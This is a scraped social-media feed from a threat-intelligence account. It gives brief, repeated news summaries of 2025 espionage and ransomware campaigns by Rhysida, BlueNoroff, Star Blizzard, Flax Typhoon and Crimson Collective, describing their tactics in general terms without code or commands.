MalWhere?
@malwhere.bsky.social
👨💻APT Insights
🕵️♂️Tracking Cyber-Espionage Threats
💻Uncovering the Dark Side of the Digital World
👇Latest Threat Analysis & Updates
🕵️♂️Tracking Cyber-Espionage Threats
💻Uncovering the Dark Side of the Digital World
👇Latest Threat Analysis & Updates
This 2025 campaign shows major escalation — 40+ code-signing certs used, 200+ revoked by Microsoft. The gang also pushes Latrodectus malware via similar tactics. Rhysida’s malvertising ops are growing bolder & more dangerous.
#APT #Rhysida #OysterLoader #CyberThreat
#APT #Rhysida #OysterLoader #CyberThreat
November 4, 2025 at 11:03 AM
This 2025 campaign shows major escalation — 40+ code-signing certs used, 200+ revoked by Microsoft. The gang also pushes Latrodectus malware via similar tactics. Rhysida’s malvertising ops are growing bolder & more dangerous.
#APT #Rhysida #OysterLoader #CyberThreat
#APT #Rhysida #OysterLoader #CyberThreat
How it works: Rhysida buys search ads on Bing, leading users to fake download sites that mimic legit software pages. Clicking downloads OysterLoader, a stealthy first-stage loader giving attackers long-term system access.
#ThreatIntel #CyberAttack #Malvertising
#ThreatIntel #CyberAttack #Malvertising
November 4, 2025 at 11:03 AM
How it works: Rhysida buys search ads on Bing, leading users to fake download sites that mimic legit software pages. Clicking downloads OysterLoader, a stealthy first-stage loader giving attackers long-term system access.
#ThreatIntel #CyberAttack #Malvertising
#ThreatIntel #CyberAttack #Malvertising
The campaigns enable credential theft, cloud compromise, and extensive data exfiltration across both platforms. Kaspersky notes BlueNoroff’s growing use of generative AI to enhance malware development and streamline operations.
#CyberSecurity #LazarusGroup #ThreatIntel
#CyberSecurity #LazarusGroup #ThreatIntel
October 30, 2025 at 11:26 AM
The campaigns enable credential theft, cloud compromise, and extensive data exfiltration across both platforms. Kaspersky notes BlueNoroff’s growing use of generative AI to enhance malware development and streamline operations.
#CyberSecurity #LazarusGroup #ThreatIntel
#CyberSecurity #LazarusGroup #ThreatIntel
GhostCall uses fake Zoom or Teams meeting links that push malicious SDK “updates,” infecting macOS and Windows systems. GhostHire delivers malware through booby-trapped GitHub coding tests sent to developers, executing payloads like DownTroy, RooTroy, and CosmicDoor.
October 30, 2025 at 11:26 AM
GhostCall uses fake Zoom or Teams meeting links that push malicious SDK “updates,” infecting macOS and Windows systems. GhostHire delivers malware through booby-trapped GitHub coding tests sent to developers, executing payloads like DownTroy, RooTroy, and CosmicDoor.
3/3
Researchers warn Transparent Tribe is expanding cross-platform espionage ops alongside Bitter, SideWinder, and OceanLotus, marking an escalating South Asian cyber arms race. #CyberSecurity #APT #ThreatIntel
Researchers warn Transparent Tribe is expanding cross-platform espionage ops alongside Bitter, SideWinder, and OceanLotus, marking an escalating South Asian cyber arms race. #CyberSecurity #APT #ThreatIntel
October 27, 2025 at 8:52 AM
3/3
Researchers warn Transparent Tribe is expanding cross-platform espionage ops alongside Bitter, SideWinder, and OceanLotus, marking an escalating South Asian cyber arms race. #CyberSecurity #APT #ThreatIntel
Researchers warn Transparent Tribe is expanding cross-platform espionage ops alongside Bitter, SideWinder, and OceanLotus, marking an escalating South Asian cyber arms race. #CyberSecurity #APT #ThreatIntel
2/3
DeskRAT hits BOSS Linux, using systemd, cron, and bashrc persistence to steal files, drop payloads, and execute commands over WebSockets. Windows variants called StealthServer share its code and methods. #LinuxSecurity #ThreatIntel #Infosec
DeskRAT hits BOSS Linux, using systemd, cron, and bashrc persistence to steal files, drop payloads, and execute commands over WebSockets. Windows variants called StealthServer share its code and methods. #LinuxSecurity #ThreatIntel #Infosec
October 27, 2025 at 8:52 AM
2/3
DeskRAT hits BOSS Linux, using systemd, cron, and bashrc persistence to steal files, drop payloads, and execute commands over WebSockets. Windows variants called StealthServer share its code and methods. #LinuxSecurity #ThreatIntel #Infosec
DeskRAT hits BOSS Linux, using systemd, cron, and bashrc persistence to steal files, drop payloads, and execute commands over WebSockets. Windows variants called StealthServer share its code and methods. #LinuxSecurity #ThreatIntel #Infosec
Analysts say ColdRiver refined its chains, encrypting payloads + hiding artifacts. Active Jun–Sept, campaigns hit Western govs, NGOs + journalists. Linked to Russia’s FSB, Star Blizzard keeps adapting — a storm that won’t fade. #CyberEspionage #Malware #GTIG
October 22, 2025 at 10:14 AM
Analysts say ColdRiver refined its chains, encrypting payloads + hiding artifacts. Active Jun–Sept, campaigns hit Western govs, NGOs + journalists. Linked to Russia’s FSB, Star Blizzard keeps adapting — a storm that won’t fade. #CyberEspionage #Malware #GTIG
After Google exposed LostKeys in May, Star Blizzard dumped it fast — retooling within days. Their Robot malware family evolved fast: NOROBOT builds persistence, while MAYBEROBOT (a PowerShell backdoor) steals data + executes commands. #ThreatIntel #Infosec
October 22, 2025 at 10:14 AM
After Google exposed LostKeys in May, Star Blizzard dumped it fast — retooling within days. Their Robot malware family evolved fast: NOROBOT builds persistence, while MAYBEROBOT (a PowerShell backdoor) steals data + executes commands. #ThreatIntel #Infosec
(3/3)
The August 2025 update added victim profiling, letting attackers filter and sell stolen data by value.
Experts call OtterCandy a glimpse of the future — decentralized, intelligent malware built on trusted web frameworks.
#InfoSec #CyberThreats #Malware #WaterPlumClusterB
The August 2025 update added victim profiling, letting attackers filter and sell stolen data by value.
Experts call OtterCandy a glimpse of the future — decentralized, intelligent malware built on trusted web frameworks.
#InfoSec #CyberThreats #Malware #WaterPlumClusterB
October 20, 2025 at 8:50 AM
(3/3)
The August 2025 update added victim profiling, letting attackers filter and sell stolen data by value.
Experts call OtterCandy a glimpse of the future — decentralized, intelligent malware built on trusted web frameworks.
#InfoSec #CyberThreats #Malware #WaterPlumClusterB
The August 2025 update added victim profiling, letting attackers filter and sell stolen data by value.
Experts call OtterCandy a glimpse of the future — decentralized, intelligent malware built on trusted web frameworks.
#InfoSec #CyberThreats #Malware #WaterPlumClusterB
(2/3)
Unlike typical malware, OtterCandy uses Socket.IO servers to maintain encrypted, real-time C2 connections — hiding in normal web traffic.
Its modular design and cross-OS compatibility mark it as a new generation of stealthy, adaptable cyberweapons.
Unlike typical malware, OtterCandy uses Socket.IO servers to maintain encrypted, real-time C2 connections — hiding in normal web traffic.
Its modular design and cross-OS compatibility mark it as a new generation of stealthy, adaptable cyberweapons.
October 20, 2025 at 8:50 AM
(2/3)
Unlike typical malware, OtterCandy uses Socket.IO servers to maintain encrypted, real-time C2 connections — hiding in normal web traffic.
Its modular design and cross-OS compatibility mark it as a new generation of stealthy, adaptable cyberweapons.
Unlike typical malware, OtterCandy uses Socket.IO servers to maintain encrypted, real-time C2 connections — hiding in normal web traffic.
Its modular design and cross-OS compatibility mark it as a new generation of stealthy, adaptable cyberweapons.
The attackers then installed SoftEther VPN to maintain persistence and move laterally across internal systems.
Researchers say Flax Typhoon’s use of legitimate software like ArcGIS shows a growing trend in “living off the land” espionage tactics.
#InfoSec #CyberEspionage
Researchers say Flax Typhoon’s use of legitimate software like ArcGIS shows a growing trend in “living off the land” espionage tactics.
#InfoSec #CyberEspionage
October 14, 2025 at 1:00 PM
The attackers then installed SoftEther VPN to maintain persistence and move laterally across internal systems.
Researchers say Flax Typhoon’s use of legitimate software like ArcGIS shows a growing trend in “living off the land” espionage tactics.
#InfoSec #CyberEspionage
Researchers say Flax Typhoon’s use of legitimate software like ArcGIS shows a growing trend in “living off the land” espionage tactics.
#InfoSec #CyberEspionage
Using stolen admin credentials, the hackers uploaded a malicious Java extension (SOE) that took encoded commands through the ArcGIS REST API — disguised as normal activity. A secret key ensured only they could access the hidden backdoor.
October 14, 2025 at 1:00 PM
Using stolen admin credentials, the hackers uploaded a malicious Java extension (SOE) that took encoded commands through the ArcGIS REST API — disguised as normal activity. A secret key ensured only they could access the hidden backdoor.
Victims get ransom notes via AWS’s own email service (SES).
Crimson Collective has teamed up with Scattered Lapsus$ Hunters to boost extortion pressure.
AWS urges use of short-term creds, least-privilege IAM, and secret monitoring.
#InfoSec #CloudAttacks #Hacking #CrimsonCollective
Crimson Collective has teamed up with Scattered Lapsus$ Hunters to boost extortion pressure.
AWS urges use of short-term creds, least-privilege IAM, and secret monitoring.
#InfoSec #CloudAttacks #Hacking #CrimsonCollective
October 9, 2025 at 2:54 PM
Victims get ransom notes via AWS’s own email service (SES).
Crimson Collective has teamed up with Scattered Lapsus$ Hunters to boost extortion pressure.
AWS urges use of short-term creds, least-privilege IAM, and secret monitoring.
#InfoSec #CloudAttacks #Hacking #CrimsonCollective
Crimson Collective has teamed up with Scattered Lapsus$ Hunters to boost extortion pressure.
AWS urges use of short-term creds, least-privilege IAM, and secret monitoring.
#InfoSec #CloudAttacks #Hacking #CrimsonCollective
According to Rapid7, the group compromises long-term AWS keys and IAM accounts to gain admin-level control.
They use TruffleHog to find exposed credentials, create new privileged IAM users, and exfiltrate data from RDS, EBS, and S3 via API calls — all from within AWS.
They use TruffleHog to find exposed credentials, create new privileged IAM users, and exfiltrate data from RDS, EBS, and S3 via API calls — all from within AWS.
October 9, 2025 at 2:54 PM
According to Rapid7, the group compromises long-term AWS keys and IAM accounts to gain admin-level control.
They use TruffleHog to find exposed credentials, create new privileged IAM users, and exfiltrate data from RDS, EBS, and S3 via API calls — all from within AWS.
They use TruffleHog to find exposed credentials, create new privileged IAM users, and exfiltrate data from RDS, EBS, and S3 via API calls — all from within AWS.
Attackers used the zero-day to gain admin access, drop RMM tools (SimpleHelp, MeshAgent) & move laterally before exfiltrating data via Cloudflare tunnels. CISA says patch now or disconnect by Oct 20—unpatched systems risk full compromise.
October 8, 2025 at 8:33 AM
Attackers used the zero-day to gain admin access, drop RMM tools (SimpleHelp, MeshAgent) & move laterally before exfiltrating data via Cloudflare tunnels. CISA says patch now or disconnect by Oct 20—unpatched systems risk full compromise.
Analysts warn ransomware actors are shifting from banks to luxury & retail, exploiting weak defenses in high-profile brands. As groups monetize stolen data through resale & leaks, the luxury sector faces mounting risk to reputation & customer trust.
October 6, 2025 at 8:42 AM
Analysts warn ransomware actors are shifting from banks to luxury & retail, exploiting weak defenses in high-profile brands. As groups monetize stolen data through resale & leaks, the luxury sector faces mounting risk to reputation & customer trust.